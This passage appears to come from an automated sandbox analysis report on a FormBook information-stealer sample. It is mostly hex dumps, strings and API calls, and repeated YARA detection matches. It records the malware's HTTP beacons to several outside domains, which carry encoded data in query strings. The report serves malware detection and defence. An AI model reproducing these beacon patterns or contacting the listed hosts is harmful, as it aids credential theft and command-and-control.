72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 09:48:06 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: 5tCYPTkM6b.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 5tCYPTkM6b.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.298803762.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.276761296.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.374119582.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.312026121.0000000006840000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.inslidr.com
          Source: global trafficHTTP traffic detected: GET /b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 HTTP/1.1Host: www.carriewilliamsinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 HTTP/1.1Host: www.gooooooo.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 HTTP/1.1Host: www.yixuan5.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 HTTP/1.1Host: www.farmacymerchants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5tCYPTkM6b.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
